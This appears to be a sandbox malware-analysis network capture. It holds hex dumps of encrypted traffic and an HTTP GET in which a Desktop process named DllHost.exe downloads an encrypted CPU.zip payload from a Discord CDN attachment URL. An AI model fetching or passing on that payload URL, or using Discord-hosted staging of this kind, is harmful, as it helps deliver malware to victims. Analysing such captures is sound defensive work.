                                                                                                                                                            2022-07-07 07:51:09 UTC822INData Raw: 6e 6f 71 fb 69 7f b2 04 ca 80 34 4c 63 54 09 47 6a 9f 01 5f 65 7a 48 ce 21 f9 58 cd 8b 0b 94 06 4a 7a bd 1e fe c9 19 b4 ea e3 ca 4e 08 e6 b0 60 87 94 3c 87 fd d1 7d df a0 09 e7 46 76 d7 74 65 0f e2 ea ca 83 d0 59 4b d5 1f f8 b6 3c 87 8e b9 8a ac ed b7 06 21 0c f8 5c 0c 10 0a d5 3a 57 13 35 1a b1 23 75 9f bc ce 04 ff a2 41 53 bf b2 86 56 97 ab 27 85 b2 33 d0 e4 20 f8 9f 98 d1 b5 96 77 1e 81 b1 e9 5d e1 63 0c ad ad 27 1a c9 7b f5 74 a0 ba 2b de dc 8c 65 1a 33 47 fc b8 0f c9 20 90 37 73 14 bd 7f 9f b2 67 7f 0e 46 70 28 8a e8 ea f9 be 7b c7 ca 4d 76 08 a2 9b bf 50 f0 d6 d1 17 91 20 41 79 38 a3 14 c3 64 7d c6 40 32 da 89 9c 51 81 f0 3c 91 02 9b 75 38 b1 d7 78 26 b9 bb 82 78 91 cb 8b f9 ef 92 fd 2c e9 61 8b 95 d8 c7 92 45 0d b2 13 1a 72 1e ce da 61 a1 89 56 b9
                                                                                                                                                            Data Ascii: noqi4LcTGj_ezH!XJzN`<}FvteYK<!\:W5#uASV'3 w]c'{t+e3G 7sgFp({MvP Ay8d}@2Q<u8x&x,aEraV
                                                                                                                                                            2022-07-07 07:51:09 UTC838INData Raw: c0 2e ac c1 a1 04 6d dd f7 83 36 4c 11 6c fb 66 ad 80 0d 33 13 13 94 94 71 93 9e d4 52 17 74 f3 5b 37 5e fb 7b 4c 80 b8 4d 2a 43 85 0b 52 5e a7 76 44 cd 2d 72 d4 01 dc d2 04 3d 94 ac a3 d9 da 8a 15 a8 5c 45 7b a4 88 95 29 e4 79 49 30 d4 22 3f e2 3a 02 b4 8e 84 f5 77 e4 6d 2e a1 bc 41 af ae 2e 95 bb 0c d5 b7 05 4b 4f bf 46 88 e3 40 63 ce 3d ab 43 71 a7 e4 88 87 3a a2 7f ce 3a 32 0c 08 7a a6 db 25 6d 0d 39 f2 0f fc 3e 5f c5 01 1f 73 e7 0c f3 83 b2 57 95 ce 7b d6 c3 c0 36 fa a1 44 41 40 c7 2f 87 ef b2 fa 4d 3b 0f 34 28 b1 27 df 72 64 4b 5c 6f f9 a6 28 23 b4 15 23 34 2f fd 45 8d 4a 81 e7 a3 c6 9f 20 ac 70 69 26 d2 ea 2d 10 e2 c9 65 85 2d 49 3f d9 06 2c 3e 9a 21 30 83 15 60 03 d1 44 d8 1a 01 9a a5 ea a1 b7 f3 85 f5 cf f6 50 90 7a da ed fb 8f fa 9f ad c8 80 94
                                                                                                                                                            Data Ascii: .m6Llf3qRt[7^{LM*CR^vD-r=\E{)yI0"?:wm.A.KOF@c=Cq::2z%m9>_sW{6DA@/M;4('rdK\o(##4/EJ pi&-e-I?,>!0`DPz
                                                                                                                                                            2022-07-07 07:51:09 UTC854INData Raw: 13 dd c1 aa 33 0b f0 2c 67 66 b7 9c f4 63 2a 6e cc 87 2b 6f 54 70 a1 ae dd 26 f8 63 3d b9 18 7c bf 68 97 7e 3d d1 cd 35 4b 7c 5b 1b 25 3a 42 10 99 a2 b3 78 44 ef 3d 20 1b df 7b d0 2e 3a c4 fe 7e 99 c9 d1 05 98 c7 a5 4e 61 3e ba 5e 32 8c c7 b5 4b b6 fa e7 db 4e cc 2a 6a a2 f2 a2 36 b9 c4 f5 e8 a7 04 64 02 31 0f 09 da 68 5e be d2 16 0d d2 2d c8 c7 ff 50 bd d3 b0 1b 10 7c 6b 13 f1 b1 a8 d9 ce f4 21 69 d0 a4 28 cc 78 3a b6 57 34 9e d1 e6 72 be 3d ce 29 2a 04 c3 dc 0a a1 1d e0 5a 87 68 72 bd 40 43 9d 5b 65 65 5b ed c6 d5 a6 97 c7 ed e1 ec 24 48 19 c4 22 6f e3 d9 d1 f7 01 2d 4c 94 ec fc 4d 98 fb ee 57 14 9c 91 f8 c6 d1 56 40 9c 5b 60 9c a9 19 57 8f 08 5a bc d8 75 0e 8a 2a 4e fb fd 3d e8 7e b9 c9 33 4f d1 79 55 b6 31 88 39 b2 47 df cd 70 20 78 5c b9 5f 92 5f 0c
                                                                                                                                                            Data Ascii: 3,gfc*n+oTp&c=|h~=5K|[%:BxD= {.:~Na>^2KN*j6d1h^-P|k!i(x:W4r=)*Zhr@C[ee[$H"o-LMWV@[`WZu*N=~3OyU19Gp x\__
                                                                                                                                                            2022-07-07 07:51:09 UTC870INData Raw: 57 4e 84 a3 4e 95 93 75 26 1f c9 2c 31 3d e3 fd 07 fa 89 76 a5 95 02 8b 59 46 97 76 f3 01 13 a2 56 ae 2e 68 48 f0 c6 f2 4f 4c a3 13 eb f4 df fc f5 e8 a9 b4 57 be 78 77 84 cb e1 24 26 34 62 d3 58 2c 73 e6 ea f5 0c 09 99 81 28 22 c9 d7 0e 0d cd 34 9d 26 7f f2 a1 25 1e 83 98 46 cb cf a6 53 c8 12 cd 72 40 93 00 36 03 9e 94 e2 dd be 00 a9 7a 1b 6f ce b1 7f 6b 75 34 06 c2 41 dd cd c9 4d e9 79 8a d2 1d 82 1a 2e 76 09 89 d4 f5 48 08 65 c8 94 3b 85 e8 cf f2 d3 d3 7b e2 c4 a3 7f 7a 62 17 67 60 6c ad 27 59 0c 70 21 3a 52 1d 51 e8 11 ec 3e 51 35 9a 8a 46 2e b7 69 e0 d3 41 c1 ba b8 ee 35 3e 50 3e 42 64 a6 71 7f 4d ae 01 cb 54 44 91 28 e9 aa b7 c2 f0 33 87 16 3c cf a1 6d d4 be 10 01 60 7e 13 cf 25 10 ef 01 64 5a 3d 55 d2 5f 11 b1 b7 fc ba 2c 39 31 64 e3 81 ef b2 46 e9
                                                                                                                                                            Data Ascii: WNNu&,1=vYFvV.hHOLWxw$&4bX,s("4&%FSr@6zoku4AMy.vHe;{zbg`l'Yp!:RQ>Q5F.iA5>P>BdqMTD(3<m`~%dZ=U_,91dF
                                                                                                                                                            2022-07-07 07:51:09 UTC886INData Raw: 61 fe a2 74 c9 c2 2b d8 cd 79 bc aa c8 fd 04 a6 74 50 df e7 f7 02 58 14 d1 64 50 97 bf 2e 08 b0 f2 a6 11 e1 a7 52 14 88 47 7b 50 c0 1b 4a 61 07 8b f4 55 b7 be 6b b9 07 51 21 e1 bf 38 f9 22 36 49 fd 6a 25 c4 36 a3 0a 78 40 fa c9 53 75 f8 03 60 f3 ec ab 6c cd 3c d0 a8 a4 af fb 3e 51 11 b3 8d 8b ba a0 a9 0d 0c c3 8a e0 f6 23 ba 46 91 16 e2 d9 f4 18 ff a9 d4 66 03 fe 59 be 81 f3 e0 d8 89 99 28 8c b6 3c 91 83 f2 6d c0 d3 5f 7b 1c 93 dd 7d db 55 a2 02 cc cc d6 87 c1 39 79 e0 59 d0 0f 41 df 1a 01 1d 58 96 59 92 3f 61 38 20 76 91 bd 9c bc dc 41 ff cc 80 fe c8 93 ed 87 3f e9 35 5f 5f e9 1a 65 34 28 be 85 8a f6 26 e0 ea ed 32 52 d2 94 d5 a1 c9 e5 3b 55 38 a1 11 aa cd b4 04 f9 c6 92 6c 44 99 f1 e5 97 ca dc c6 85 ef 11 b5 eb ec e5 f4 ae c6 fc 3b 2b 24 6c 11 dc 80 e5
                                                                                                                                                            Data Ascii: at+ytPXdP.RG{PJaUkQ!8"6Ij%6x@Su`l<>Q#FfY(<m_{}U9yYAXY?a8 vA?5__e4(&2R;U8lD;+$l
                                                                                                                                                            2022-07-07 07:51:09 UTC902INData Raw: 65 5a 07 a4 5e 3a 84 37 68 ae 3e 16 52 51 fe 45 00 05 48 96 a8 9f ec 90 7e 9e b5 92 8f a0 d1 da 75 8a ee 85 d7 fd 22 3b 1c f0 ef 77 db 3d 6c de de a4 6c 5a a1 e9 b1 7d 11 3e 20 8f a7 ff 5a a1 f5 5e 56 07 86 d6 b4 c5 2d fd a8 26 9b 81 ab d4 f8 c5 c5 e2 27 a3 1b 4c d2 d2 39 c7 c0 c9 78 1b 40 7e ad d3 bd 5c ae 80 7f 28 51 17 4e 18 f7 31 25 90 7e 49 d6 c5 60 3d f7 29 fc 60 9b 92 e0 f3 f9 19 de 8f 5d 90 02 6d 74 ca 44 4d cf 41 9f 90 0a 80 5c f3 91 bb 07 e2 04 4a 73 a1 d1 1f 09 60 fe 6b c4 f3 cf 6e 73 4e 1d 2f 89 76 8c cd e5 bc 47 cf c0 47 2c 35 9a 84 ee 9d 02 a5 21 2c 60 fc 54 29 bd 89 0d 72 46 24 5b d5 73 82 8e 7f e9 8b f7 07 13 d4 a6 51 b0 00 ef c8 f3 0f 81 fa 7f 92 1f dc d1 79 ee 97 3d 49 bb 67 1d 3e 4b fb de d8 5d c6 94 e7 fd ae 2c 36 3c ca 39 56 a4 0b 96
                                                                                                                                                            Data Ascii: eZ^:7h>RQEH~u";w=llZ}> Z^V-&'L9x@~\(QN1%~I`=)`]mtDMA\Js`knsN/vGG,5!,`T)rF$[sQy=Ig>K],6<9V
                                                                                                                                                            2022-07-07 07:51:09 UTC918INData Raw: 27 7e d2 55 0c 71 3f 59 e7 74 7e ce d5 e6 2a 54 00 9f d1 e8 05 57 af d5 6c 1e 28 3b 40 18 17 42 25 fa b2 09 68 17 d7 3c 62 b6 01 25 56 95 21 f2 44 6f 37 5e c1 52 fd d6 e4 7c 4b b1 a8 2b 59 15 a6 04 3a 6f af 88 b5 ad 70 87 d4 55 d7 56 d9 0c bb 01 20 d1 17 42 5e 36 56 9b 28 34 2f 3e ae 4c 25 e7 f2 fd d9 de 20 a3 c0 6a d6 2a 4e e6 f4 ed f1 b0 3c 6f bd 58 0a ea 1b 42 bf 3e 97 ad 04 cd 18 d6 ad d4 d1 15 51 58 4d cd c5 4d 1a 6f 23 eb 1e e6 71 65 d3 8f ee d7 17 14 14 40 e9 73 1e 90 dd 06 e1 e2 05 c9 c8 bb d1 a2 c9 17 c4 75 32 0c 9e 07 aa 0c 2f b9 1d 30 9c dc 37 d8 0e fa 03 bc a7 a1 47 7d 46 7c ba 2e 59 91 19 25 c2 1b 17 9c 7a 37 af 4a 6b 0b 48 63 a4 f5 60 56 27 12 26 f4 53 12 9e 99 bf e3 8e 59 c6 3e ed 24 97 cf 1c be 9d 43 69 79 2c 20 e0 73 de 5d 61 89 13 28 65
                                                                                                                                                            Data Ascii: '~Uq?Yt~*TWl(;@B%h<b%V!Do7^R|K+Y:opUV B^6V(4/>L% j*N<oXB>QXMMo#qe@su2/07G}F|.Y%z7JkHc`V'&SY>$Ciy, s]a(e


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            3192.168.2.449754162.159.134.233443C:\Users\user\Desktop\DllHost.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-07-07 07:51:12 UTC927OUTGET /attachments/993716767685873716/993957763715698769/CPU.zip HTTP/1.1
                                                                                                                                                            Accept: */*
                                                                                                                                                            UA-CPU: AMD64
                                                                                                                                                            Accept-Encoding: gzip, deflate
                                                                                                                                                            User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                            Host: cdn.discordapp.com
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            2022-07-07 07:51:12 UTC927INHTTP/1.1 200 OK
                                                                                                                                                            Date: Thu, 07 Jul 2022 07:51:12 GMT
                                                                                                                                                            Content-Type: application/zip
                                                                                                                                                            Content-Length: 3426927
                                                                                                                                                            Connection: close
                                                                                                                                                            CF-Ray: 726efe5cbabf916e-FRA
                                                                                                                                                            Accept-Ranges: bytes
                                                                                                                                                            Age: 766
                                                                                                                                                            Cache-Control: public, max-age=31536000
                                                                                                                                                            Content-Disposition: attachment;%20filename=CPU.zip
                                                                                                                                                            ETag: "9717df35202bd7076b9f3afd8d1ceac6"
                                                                                                                                                            Expires: Fri, 07 Jul 2023 07:51:12 GMT
                                                                                                                                                            Last-Modified: Tue, 05 Jul 2022 19:13:17 GMT
                                                                                                                                                            Vary: Accept-Encoding
                                                                                                                                                            CF-Cache-Status: HIT
                                                                                                                                                            Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                                                                                                                                            Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                                            x-goog-generation: 1657048397806071
                                                                                                                                                            x-goog-hash: crc32c=wXJCVw==
                                                                                                                                                            x-goog-hash: md5=lxffNSAr1wdrnzr9jRzqxg==
                                                                                                                                                            x-goog-metageneration: 1
                                                                                                                                                            x-goog-storage-class: STANDARD
                                                                                                                                                            x-goog-stored-content-encoding: identity
                                                                                                                                                            x-goog-stored-content-length: 3426927
                                                                                                                                                            X-GUploader-UploadID: ADPycdvXjhNbg1856U9WOF9So39j-5hIV2wuKA4VJGTm3LPguJ92hnE-G2h5q0VdyfZxaXyX2Cjxysyb4DJNtIQn9H-O
                                                                                                                                                            X-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodp
                                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=R%2B8rdnwyFfAbZ3yTYGD6YzuspQZADvKcTUPj%2FG1QXvt8UGpfOzaK47CpN4%2F0ECbDg7sqN9HQMNF6S01l9vIlR8WojJu4aQ9W%2FWUwCZiP0q%2B1hsy3RsC6BroLOgQ%2Bb2nUE20Z2A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                            2022-07-07 07:51:12 UTC928INData Raw: 4e 45 4c 3a 20 7b 22 73 75 63 63 65 73 73 5f 66 72 61 63 74 69 6f 6e 22 3a 30 2c 22 72 65 70 6f 72 74 5f 74 6f 22 3a 22 63 66 2d 6e 65 6c 22 2c 22 6d 61 78 5f 61 67 65 22 3a 36 30 34 38 30 30 7d 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
                                                                                                                                                            Data Ascii: NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflare
                                                                                                                                                            2022-07-07 07:51:12 UTC928INData Raw: 50 4b 03 04 14 00 09 00 08 00 d4 b0 e5 54 a6 25 5e 74 93 00 00 00 8c 00 00 00 0a 00 00 00 63 6f 6e 66 69 67 2e 74 78 74 cc c3 d4 4f a6 d8 a3 d4 52 4b be 26 3f 69 3a 0a d1 0b e4 db e1 c6 bf 0d e7 a7 c7 9c dd c6 4a 28 8d ee b9 ff 69 ab fe 6d cc dd b0 12 2b 5e c9 a7 35 23 7d bd fe b5 6c 40 52 2b 3a 8b f3 80 a1 4f 19 e4 0c c9 5f ad 05 24 35 c3 e8 eb 97 ad 61 03 e4 34 5b f8 3b 39 ef c1 6b c6 fb 46 3a 07 e1 78 49 0b 2e ec 8c dc 93 86 55 93 95 36 ae af 5f 61 7d c7 24 59 cb b4 f4 eb 2f e5 97 c3 1d d4 2a 1a 44 7a 46 c7 51 73 cc db 38 8b ba 74 a1 23 7e 96 ca 31 35 50 4b 07 08 a6 25 5e 74 93 00 00 00 8c 00 00 00 50 4b 03 04 14 00 09 00 08 00 21 ab e5 54 59 e4 45 a9 19 00 00 00 0b 00 00 00 08 00 00 00 6e 61 6d 65 2e 74 78 74 c5 e1 1d 1a 12 89 6e 87 af 12 99 ba 28 76
                                                                                                                                                            Data Ascii: PKT%^tconfig.txtORK&?i:J(im+^5#}l@R+:O_$5a4[;9kF:xI.U6_a}$Y/*DzFQs8t#~15PK%^tPK!TYEname.txtn(v
                                                                                                                                                            2022-07-07 07:51:12 UTC930INData Raw: f4 b9 d8 18 5c da c4 0a 45 e0 d7 a0 25 14 95 9e f6 ce f6 fb e2 52 ce 3b 16 9e d5 4c 8c 41 4f e2 2c 58 3f a6 87 74 ed 42 7b 72 47 06 7c 9a 0a 7e e8 e0 17 f3 6a 87 48 a7 ed ea f5 bd 23 7d 06 c5 c9 7a 72 36 0e 38 45 de 5a 0e f4 2f 0d 54 8a 2c 13 d3 90 46 99 86 bc 82 7f 14 47 11 16 a8 e5 85 2d 13 07 9e 07 9a 64 6a fe cc e5 b5 66 42 ec 0e 68 34 af 4b 44 57 9b 91 71 bf 8d 17 d1 47 61 d2 7b f7 24 3c 91 c5 a2 45 a5 a4 f9 d1 ae ad 4f bf aa 80 1f d8 d4 38 2a a1 22 f3 5d d9 ea d4 82 09 29 20 9b 0e 15 7d d8 68 f6 67 ff 88 ff 10 eb 62 a7 18 38 b7 2e a4 56 a4 f4 ed 7d b7 8e 78 82 76 60 89 14 13 5d 6d e0 ae 8d 92 aa 97 db 94 0e 2d fd 1d f8 50 08 e0 6d 33 a9 0c 78 04 8c c2 9e dd cc 99 32 21 ff 5e 1f d5 e3 8a a6 7a 60 0b 8a 68 42 a1 e9 9f 61 cb 63 fd f0 30 5a 77 d6 62 09
                                                                                                                                                            Data Ascii: \E%R;LAO,X?tB{rG|~jH#}zr68EZ/T,FG-djfBh4KDWqGa{$<EO8*"]) }hgb8.V}xv`]m-Pm3x2!^z`hBac0Zwb
                                                                                                                                                            2022-07-07 07:51:12 UTC931INData Raw: df 51 45 a3 09 9d 7c 2f 55 ee 48 32 2c dd 13 78 02 de 7a 25 61 71 fd 60 36 5e 0e 72 26 80 b3 29 4e 7d 51 cf 6c 2a f3 95 16 df 0c f3 f1 f7 da 99 77 2c b0 8c b6 82 cb 7a d4 0c 97 05 c1 c2 39 ad 71 43 9a 99 8b dd 32 de 91 21 6f df 5c 74 20 48 5a 34 7f c1 1b b9 0d e5 db 22 ad 5d e4 b6 e4 1b c3 fa 52 5b 71 5b fc 14 b6 57 1a ee e1 e2 11 32 af 22 2c 61 28 24 9f fd d9 87 f1 06 ed 81 ce c4 ed 16 0f 57 1f 9f cc 68 3f 24 ce 11 a6 ac b8 52 87 c5 e9 94 17 30 a7 46 0c da 36 08 71 44 d7 d0 cd 5e a3 46 20 f1 f7 04 88 8a 1f 9d 7d dd 10 ec cd 03 cf a5 4b e8 11 24 92 f5 98 10 4a 3e 8f d2 91 77 7c 2b e6 00 5b ec 17 ab 63 33 a9 8d 9c 07 9a b1 be 6c d1 32 1b 29 ca 86 b3 45 9b 63 a0 3d c3 d9 6f b6 cc fc 74 9b e5 ee 54 9e 70 ac 91 c3 0b dc 51 02 05 43 5f f8 52 e0 b7 9b 7d 39 02
                                                                                                                                                            Data Ascii: QE|/UH2,xz%aq`6^r&)N}Ql*w,z9qC2!o\t HZ4"]R[q[W2",a($Wh?$R0F6qD^F }K$J>w|+[c3l2)Ec=otTpQC_R}9
                                                                                                                                                            2022-07-07 07:51:12 UTC932INData Raw: a8 c6 2d 36 09 92 55 9b af 33 1d ac 8d a2 32 63 a4 fc 4b 36 ae 39 c4 88 3d c9 80 62 00 12 a1 92 9f a2 86 42 53 1d 7a 62 a2 8f 85 37 fd 18 52 ba c6 52 6d ae 7e f9 b8 bb bd ee 34 05 88 9e 76 bb 11 2c 2f 6b f9 fb 65 db 4b 00 e2 29 ec fc bc bc 5f 2d 0e e5 7e ee 0e 04 6f ac ac e4 97 5c 10 e5 06 03 85 1d 31 86 bc 71 69 2a 0e 34 af 66 7d 62 d5 07 59 dd 0d d7 6b 2e 20 70 a2 48 f7 51 b5 76 18 e6 c9 e3 57 93 0c 83 a4 a0 7f 1a a0 bd 09 29 d2 41 34 37 4b f9 3e 25 8e 99 91 0d 2d 16 1f 68 55 61 65 63 91 96 5e 00 f4 51 80 6b 32 cc 5a c7 96 4b 10 96 66 5f 8d ba 77 73 45 cf 2b 9f 7d f3 e0 01 2c d5 65 be 08 63 b8 69 55 bf c6 8f 50 4d c0 ed 9b f7 d6 c0 ea 7f ca 1b f7 6f fc b1 7c 36 c5 af ef cc 8e 2b 91 2f 35 4a ff 5b b9 d6 a7 1d db d4 a2 f7 8c 36 f1 04 97 8c 54 d8 75 8d 86
                                                                                                                                                            Data Ascii: -6U32cK69=bBSzb7RRm~4v,/keK)_-~o\1qi*4f}bYk. pHQvW)A47K>%-hUaec^Qk2ZKf_wsE+},eciUPMo|6+/5J[6Tu
                                                                                                                                                            2022-07-07 07:51:12 UTC934INData Raw: 74 87 af 2c ff 67 65 db c4 ba 59 8e 9e d5 10 af 16 6e 2d d3 09 8f d2 4e e9 fb 40 26 ab a5 9e 32 99 15 82 69 b9 28 19 a0 18 2e 83 a0 f6 a7 93 fd 8e de 2d fd d9 b9 22 0a 16 1a a9 be e1 46 11 fc ae 3c 19 03 f4 c2 d9 5d 25 7d 4a 4e 6c 35 3c 44 6a 66 ff 7a 00 65 cf 93 1a e6 3a 27 8c 27 75 3c aa cd 44 8e 04 36 bb 4f d8 0a 71 1b 89 3d 7a 20 e7 f1 47 d0 e2 d5 99 6b 39 c8 c0 d1 9c 40 53 9d bd ea 4f 3d b4 5e 7c 30 5f a3 79 a5 b9 07 2e e3 6f 17 59 d8 0a 64 6e c8 f6 3d d2 48 76 a3 1d a3 b7 f5 e5 36 67 4f fd 52 6e 43 20 a2 0b 9c d4 75 13 43 59 87 32 ef 63 9f 15 01 f4 a2 5e 13 07 ef 29 a6 82 c9 dc c9 a4 36 a1 e8 be 00 c7 7b 85 f5 07 61 58 5e b2 5d 23 7c 26 19 4c d1 11 aa a8 b0 e3 ba ac b6 07 46 ae 72 77 05 47 8a 4d 2b 00 0c 32 5a 94 ca 1a 11 09 02 06 ae 12 ea d5 2c 32
                                                                                                                                                            Data Ascii: t,geYn-N@&2i(.-"F<]%}JNl5<Djfze:''u<D6Oq=z Gk9@SO=^|0_y.oYdn=Hv6gORnC uCY2c^)6{aX^]#|&LFrwGM+2Z,2
                                                                                                                                                            2022-07-07 07:51:12 UTC935INData Raw: 22 41 c3 16 b9 62 bf 4f 5e 38 a2 f2 48 c0 2f a9 d8 84 a4 4f 3a 13 32 b2 a0 8c eb 24 a4 a4 e3 28 65 b5 28 89 de c9 b7 5c 48 20 d0 98 a4 2c 76 1b 03 7b 39 2f 38 c1 66 cc 02 a0 90 77 da 99 ab 66 b0 ec 32 6c ad ee 07 f6 2f de d8 b8 c8 0f f8 d9 5e a2 d6 ed b3 44 d6 66 a5 a5 5d 02 ee e4 98 b0 af da 1e 2f 7f 1d dd f6 f6 ec ab 59 74 25 71 3c 0d 98 2f c1 5b b3 a1 de da da c1 f5 2d e3 4c 3f 21 93 03 68 b6 6c 69 ac 5c 04 54 73 aa 11 d5 2e 3f 9f b2 0e 1b 3b 66 62 ea 32 2a e5 02 3a 34 4c 8c 51 a9 4d 7e d6 e1 60 63 f8 0e a6 26 2b c3 7b e6 cd bb 2f 2c 55 3c a1 98 5d 44 40 40 55 57 1c 58 a1 53 a4 16 d2 df 02 23 1b c4 86 a9 63 07 7e b9 62 b6 70 fe 16 6f e9 2e 71 4c 30 5e 44 65 db ec 82 71 73 85 5c d0 b8 29 4b d8 80 87 23 99 89 c4 ad a6 b9 c6 45 52 96 e8 ec 85 4d 10 9b da
                                                                                                                                                            Data Ascii: "AbO^8H/O:2$(e(\H ,v{9/8fwf2l/^Df]/Yt%q</[-L?!hli\Ts.?;fb2*:4LQM~`c&+{/,U<]D@@UWXS#c~bpo.qL0^Deqs\)K#ERM
                                                                                                                                                            2022-07-07 07:51:12 UTC936INData Raw: 70 fd 50 50 d4 6a 63 9c e7 f7 ae 88 94 7e 75 47 c5 d9 ea b5 ad 9a a3 4b b8 84 a9 d5 79 e1 24 80 31 9a 75 7e 4e b7 d6 b8 89 37 d8 cc 91 2d 1c 68 a5 b9 99 d8 9b 25 b9 11 88 ca c8 22 82 77 68 bc ff b7 a6 28 0a 84 4a c1 b1 da 6a e6 61 18 46 ee 2a 79 81 e4 40 82 9e d6 be 63 42 57 fa 02 41 6a ad 1b 3c 8f e2 71 1b 2a 5d 3a da 50 90 3b 05 1a 64 83 0f ad 82 34 ab 46 f6 8a 40 f1 64 86 d4 0c eb 70 ad 60 30 be 94 99 59 5e d2 94 e9 0c 32 b7 19 92 24 27 70 f3 9d f2 86 bb 04 9b 05 3c d2 e2 fd 81 26 38 44 b5 51 44 ff 3c 5f 70 14 a8 7a 9a df a5 ea 67 01 75 fa 6d 85 94 9f 8c ad b5 72 63 ba 0b 64 7e de dc d7 82 fb 4b 0c 7b 2e 9e 6d b1 3a 86 12 d9 d0 a0 0e b3 c5 b5 5f d7 30 ed ef 1b 36 08 df ee 60 98 95 23 68 81 73 2b 1a 35 60 0f 21 a9 b1 67 81 8d 91 44 1e a6 40 49 db 1e 9f
                                                                                                                                                            Data Ascii: pPPjc~uGKy$1u~N7-h%"wh(JjaF*y@cBWAj<q*]:P;d4F@dp`0Y^2$'p<&8DQD<_pzgumrcd~K{.m:_06`#hs+5`!gD@I
                                                                                                                                                            2022-07-07 07:51:12 UTC938INData Raw: 33 50 9b a5 03 45 74 c3 c8 4a dc 64 e5 bc b0 3e be 80 13 05 d4 73 b2 36 10 a5 a4 2a a7 bd 6e 0b 14 87 e1 72 24 cb 59 06 1a 64 f1 2e 2b 80 0b 71 57 eb b6 a6 55 27 f1 72 c0 f3 52 79 5e 6c 82 ea cb 13 8a bc 80 72 b2 fc a4 7e f3 c2 51 c3 bc 60 27 d5 8b 6c 53 a5 6e 4b 58 c1 a4 60 ff f6 8d a6 c8 74 bd 16 c0 63 5a 8c 8f fa bc 1e 5b c9 b7 5c 0c a0 be 12 c7 2f 1c 37 6e 7a 84 39 f5 1f e6 bf fe 5e af 1a 2c 99 be 8e ff 5a 6b 6e 63 f3 ef cc 32 1c 80 22 ba 6f 3b 72 5e 31 e4 4e dd 86 93 33 3b 7a 45 05 53 b3 0a ff 5d df a0 85 cb b1 4a 32 09 48 79 aa 42 70 1c a1 ec 20 86 1d 3b 0e ce c8 c6 a6 01 07 34 58 b3 e1 c7 92 6a 44 39 af df 4c 6d 80 97 8e d5 7e ca 5a f4 1b 85 57 1f 45 b8 2b 59 a5 7c b0 df aa 74 88 24 88 59 02 72 f0 61 e0 18 de 88 56 89 d0 0b 63 be 6d 9b 20 d0 7a d8
                                                                                                                                                            Data Ascii: 3PEtJd>s6*nr$Yd.+qWU'rRy^lr~Q`'lSnKX`tcZ[\/7nz9^,Zknc2"o;r^1N3;zES]J2HyBp ;4XjD9Lm~ZWE+Y|t$YraVcm z
                                                                                                                                                            2022-07-07 07:51:12 UTC939INData Raw: 16 f3 f8 97 55 d2 68 cc a0 46 fe a6 72 f2 20 92 10 51 93 7c 87 aa 0b 33 2d b6 4b d7 d5 02 40 01 de 47 99 9a 31 04 95 c8 34 f2 93 6b b3 8f ac 77 15 b0 77 73 d5 3a 0d 47 80 dc 84 e4 ef 96 b4 8e 9c 61 f6 89 ed a1 ff 9b 08 0f 2c db 2c 5a a0 c5 27 91 98 f1 18 66 d7 71 b4 7e d2 6f e6 87 17 22 c0 d9 e1 4a 79 2e c5 52 c4 9a be 12 7a 17 83 98 42 d1 7d 8f 15 8d de a0 57 69 26 4c 31 d2 96 7e c4 38 00 57 d9 d2 b0 11 f2 d0 5f 14 25 0e 5f 41 df 33 9c 12 34 ff 2a 7f 45 af a8 08 d8 7d 4d 03 e7 ae cf 25 a9 be 15 73 b5 ef 73 59 10 59 f8 5a 2c 54 76 d7 42 7b 87 6f c7 f6 8c 1d d5 96 48 f9 af 3e c3 5c 2e 05 8a c0 3b ce 11 6a 2c ad 7e e6 af a7 65 0e 3e 6f 37 ec 93 57 e0 d8 30 15 1d 54 f9 1c 64 0e 80 0a 6a ab 6a 55 1b 82 f7 0c 45 e3 0e b4 1e b4 74 4f 3c 87 f4 9b 0d 7b 52 9a 43
                                                                                                                                                            Data Ascii: UhFr Q|3-K@G14kwws:Ga,,Z'fq~o"Jy.RzB}Wi&L1~8W_%_A34*E}M%ssYYZ,TvB{oH>\.;j,~e>o7W0TdjjUEtO<{RC
                                                                                                                                                            2022-07-07 07:51:12 UTC940INData Raw: 3f 66 93 70 6d 26 9d f1 22 20 63 1a f1 44 30 49 b0 35 5d a2 a0 3f 78 c4 80 03 ad 2f a0 8a 10 d2 d5 b1 ac 58 15 00 cf d6 c9 d2 71 8c e9 3f 47 31 e4 1a c6 0d 46 a0 17 8b c8 4a 71 ef e1 f6 b2 06 48 1b 74 c7 46 f1 07 40 3f 44 3b 10 aa 48 b9 3b 57 b6 97 c3 7c 7b 5c 89 8f 29 f7 f6 64 aa a8 ec 65 45 c3 26 50 5a 16 7a 49 c9 26 9d c1 1f bd b1 e5 9f 16 cb 31 56 0d ec 71 cc 2a 86 d0 72 57 e6 30 b1 40 20 9f 57 64 97 24 e3 59 62 a3 e6 a4 c8 c5 64 35 2a b8 24 65 a7 22 77 11 6d 80 8a 2f 9a 7d b3 1b 31 c8 65 c8 74 19 9b 45 54 12 a0 27 d1 04 11 d8 62 21 74 04 a6 8e 33 90 bc 31 c1 99 c7 8c c4 13 c0 f0 67 93 3c e9 00 a6 1b 2d a5 81 f5 6d 8c 38 5d 66 cf 27 78 44 fc 94 86 1d 7c 19 5f b5 41 a5 53 4b 99 b2 84 a9 ad 6a db f3 d7 03 f6 83 7a 07 16 fe eb e9 00 7e 54 3d 48 d4 23 f6
                                                                                                                                                            Data Ascii: ?fpm&" cD0I5]?x/Xq?G1FJqHtF@?D;H;W|{\)deE&PZzI&1Vq*rW0@ Wd$Ybd5*$e"wm/}1etET'b!t31g<-m8]f'xD|_ASKjz~T=H#
